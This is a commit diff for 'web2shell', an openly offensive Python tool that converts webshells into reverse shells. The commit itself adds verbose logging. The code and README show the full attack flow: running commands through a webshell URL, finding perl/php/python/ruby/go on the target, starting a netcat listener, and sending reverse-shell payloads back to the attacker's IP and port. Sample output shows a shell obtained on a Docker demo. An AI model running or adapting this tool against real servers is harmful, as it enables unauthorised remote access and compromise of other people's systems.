Verbosity and logging changes

Author: ejedev

README.md

@@ -7,7 +7,7 @@ Credit for the reverse shells goes to [PayloadAllTheThings.](https://github.com/
 ## Usage
 
 ```
-usage: web2shell [-h] [-i INTERFACE] [--force] [--ip IP] [--port PORT] [--nc NC] url
+usage: web2shell [-h] [-i INTERFACE] [--force] [--ip IP] [--port PORT] [--nc NC] [--verbose] url
 
 Automate converting webshells into reverse shells.
 
@@ -22,15 +22,16 @@ options:
   --ip IP               IP address of your own listener (skips listener setup if both IP and port are set)
   --port PORT           port of your own listener
   --nc NC               path to local nc binary
+  --verbose             verbose command output
 ```
 
-The only **required** flag is the `url.`
+Providing an IP and port will cause the program to skip the listener setup and assume you already have netcat/a comparable listener running at that address.
 
 Please note: this program currently is only intended to be used on and against Linux machines.
 
 ## Requirements
 
-Install the required python modules with pip (`pip3 install -r requirements.txt`.) You will need a local copy of `nc`. The program will attempt to find it automatically. If it can't, please specify the path with the `--nc` flag.
+Install the required python modules with pip (`pip3 install -r requirements.txt`.) You will need a local copy of `nc`. The program will attempt to find it automatically. If it can't (it might not be in your `$PATH`), please specify the path to the binary with the `--nc` flag.
 
 ## Adding New Payloads
 
@@ -45,7 +46,7 @@ The included payloads have all been tested on a simple webshell and work. If you
 Example execution on local Docker image (see `demo/README.md`)
 
 ```
-[evan@ejedev web2shell]$ python3 web2shell.py  --url http://127.0.0.1:8080/cmd.php?cmd=SHELL --interface docker0
+[evan@ejedev web2shell]$ python3 web2shell.py -i docker0 http://127.0.0.1:8080/cmd.php?cmd=SHELL
 
                o                  o           o  o
                O     .oOOo.       O           O  O
@@ -66,25 +67,29 @@ Available interfaces...
 [-] br-7436527ee366
 [-] br-aa3534e13396
 [-] br-c7551daa06d2
-[-] veth87ee241
+[-] veth148b75b
 docker0 selected. Address to use is 172.17.0.1
 Testing ports...
-[-] 1025 available!
+[x] 1025 already in use or unavailable.
+[-] 1026 available!
 Finding local nc binary...
 nc target at /usr/bin/nc
-Final connection string will be 172.17.0.1:1025...
+Final connection string will be 172.17.0.1:1026...
 Finding bins...
 Ncat: Version 7.93 ( https://nmap.org/ncat )
-Ncat: Listening on :::1025
-Ncat: Listening on 0.0.0.0:1025
+Ncat: Listening on :::1026
+Ncat: Listening on 0.0.0.0:1026
 [-] perl found at /usr/bin/perl
 [-] perl found at /usr/bin/perl5.32-x86_64-linux-gnu
 [-] php found at /usr/local/bin/php
 [-] python found at /usr/bin/python3.9
+[-] ruby found at /usr/bin/ruby2.7
+[-] ruby found at /usr/bin/ruby
+[-] go found at /usr/bin/go
 Executing reverse shell...
-Bins to test: 4
+Bins to test: 7
 [!] Attempting perl payloads for path /usr/bin/perl
 Ncat: Connection from 172.17.0.2.
-Ncat: Connection from 172.17.0.2:54256.
+Ncat: Connection from 172.17.0.2:38870.
 $
 ```

demo/README.md

@@ -2,7 +2,7 @@
 
 1. Build the docker image (`docker build . --tag webshell`)
 2. Run the image (`docker run -it -p 8080:80 webshell`)
-3. Use web2shell to secure a remote connection on the docker0 interface (`python3 web2shell.py  --url http://127.0.0.1:8080/cmd.php?cmd=SHELL --interface docker0`)
+3. Use web2shell to secure a remote connection on the docker0 interface (`python3 web2shell.py --interface docker0 http://127.0.0.1:8080/cmd.php?cmd=SHELL`)
 
 Note: This Docker container has the binaries for all supported reverse shells. They are as follows:
 

modules/commands.py

@@ -3,40 +3,44 @@
 import requests
 
 from data import payloads
+from modules import logger
 
 
 def execute(url: str, command: str) -> str:
     if "SHELL" not in url:
-        print("Invalid URL. Please make sure the formatting is correct.")
+        logger.log("Invalid URL. Please make sure the formatting is correct.")
         exit()
     command_string = url.replace("SHELL", command)
     data = requests.get(command_string)
     return data.text
 
 
-def find_bins(url: str) -> list:
+def find_bins(url: str, verbose: bool) -> list:
     valid = []
     bins = list(payloads.payloads.keys())
     for bin in bins:
-        result = execute(url, f"whereis {bin}").split(" ")
-        for path in result:
+        result = execute(url, f"whereis {bin}")
+        logger.log(result, logger.Types.VERBOSE, True, verbose)
+        for path in result.split(" "):
             if "bin" in path and bin in path:
                 valid.append({bin: path})
-                print(f"[-] {bin} found at {path}")
+                logger.log(f"{bin} found at {path}", logger.Types.SUCCESS)
     return valid
 
 
-def reverse_connection(valid_bins: list, url: str, ip: str, port: int):
-    print(f"Bins to test: {len(valid_bins)}")
+def reverse_connection(valid_bins: list, url: str, ip: str, port: int, verbose: bool):
+    logger.log(f"Bins to test: {len(valid_bins)}")
     for bin in valid_bins:
-        print(f"[!] Attempting {list(bin.keys())[0]} payloads for path {list(bin.values())[0]}")
+        logger.log(f"Attempting {list(bin.keys())[0]} payloads for path {list(bin.values())[0]}", logger.Types.ALERT)
         for payload in payloads.payloads[list(bin.keys())[0]]:
             cmd = urllib.parse.quote(
                 payload.replace("PATHHERE", list(bin.values())[0]).replace("IPHERE", ip).replace("PORTHERE", str(port))
             )
-            print(execute(url, cmd))
+            result = execute(url, cmd)
+            logger.log(result, logger.Types.VERBOSE, True, verbose)
 
 
-def verify(url: str) -> bool:
+def verify(url: str, verbose: bool) -> bool:
     data = execute(url, "uname -a")
+    logger.log(data, logger.Types.VERBOSE, True, verbose)
     return "linux" in data.lower()

modules/connection.py

@@ -1,30 +1,32 @@
 import socket
 
+from modules import logger
+
 
 def get_ip(interfaces: dict, provided_inteface: str) -> str:
-    print("Available interfaces...")
+    logger.log("Available interfaces...")
     selected = None
     for interface in interfaces:
-        print(f"[-] {interface}")
+        logger.log(interface, logger.Types.SUCCESS)
         if provided_inteface == interface:
             selected = interface
     if selected is None:
-        print("No interface provided. Defaulting to localhost.")
+        logger.log("No interface provided. Defaulting to localhost.")
         return "127.0.0.1"
     else:
-        print(f"{selected} selected. Address to use is {interfaces[selected][0].address}")
+        logger.log(f"{selected} selected. Address to use is {interfaces[selected][0].address}")
         return interfaces[selected][0].address
 
 
 def get_port(ip: str) -> int:
-    print("Testing ports...")
+    logger.log("Testing ports...")
     for port in range(1025, 10000):
         try:
             s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
             s.bind((ip, port))
-            print(f"[-] {port} available!")
+            logger.log(f"{port} available!", logger.Types.SUCCESS)
             s.close()
             return port
         except:
-            print(f"[x] {port} already in use or unavailable.")
+            logger.log(f"{port} already in use or unavailable.", logger.Types.ERROR)
     return -1

modules/flags.py

@@ -51,4 +51,5 @@ def setup(parser):
         required=False,
         default=None,
     )
+    parser.add_argument("--verbose", help="verbose command output", required=False, action="store_true")
     return parser

modules/logger.py

@@ -0,0 +1,18 @@
+from enum import Enum
+
+
+class Types(Enum):
+    ALERT = "[!]"
+    ERROR = "[x]"
+    SUCCESS = "[-]"
+    VERBOSE = "[*]"
+    NONE = ""
+
+
+def log(message: str, type: Types = Types.NONE, verbose: bool = False, verbosity: bool = False):
+    if verbose and not verbosity:
+        pass
+    elif type == Types.NONE:
+        print(message)
+    else:
+        print(f"{type.value} {message}")

web2shell.py

@@ -3,7 +3,7 @@
 
 import psutil
 
-from modules import commands, connection, flags, local
+from modules import commands, connection, flags, local, logger
 
 parser = argparse.ArgumentParser(
     prog="web2shell",
@@ -13,34 +13,36 @@
 results = parser.parse_args()
 flags.splash()
 if not results.force:
-    print("Verifying commands can be executed...")
-    if not commands.verify(results.url):
-        print("System does not seem to be accepting commands. You can ignore this with --force True")
+    logger.log("Verifying commands can be executed...")
+    if not commands.verify(results.url, results.verbose):
+        logger.log(
+            "System does not seem to be accepting commands. You can ignore this with --force",
+        )
         quit()
 if results.ip is None and results.port is None:
     ip = connection.get_ip(psutil.net_if_addrs(), results.interface)
     port = connection.get_port(ip)
     if port < 1:
-        print("No ports available.")
+        logger.log("No ports available.")
         quit()
     if results.nc is not None:
         nc = results.nc
     else:
-        print("Finding local nc binary...")
+        logger.log("Finding local nc binary...")
         nc = local.find_nc()
     if nc is None:
-        print("nc not found. Please specify the path to it with --nc /path/to/bin")
+        logger.log("nc not found. Please specify the path to it with --nc /path/to/bin")
         quit()
-    print(f"nc target at {nc}")
+    logger.log(f"nc target at {nc}")
     p = subprocess.Popen(f"{nc} -nlvp {port}".split(" "), start_new_session=True)
 else:
     ip = results.ip
     port = results.port
-print(f"Final connection string will be {ip}:{port}...")
-print("Finding bins...")
-bins = commands.find_bins(results.url)
+logger.log(f"Final connection string will be {ip}:{port}...")
+logger.log("Finding bins...")
+bins = commands.find_bins(results.url, results.verbose)
 if len(bins) < 1:
-    print("No valid bins found.")
+    logger.log("No valid bins found.")
     quit()
-print("Executing reverse shell...")
-commands.reverse_connection(bins, results.url, ip, port)
+logger.log("Executing reverse shell...")
+commands.reverse_connection(bins, results.url, ip, port, results.verbose)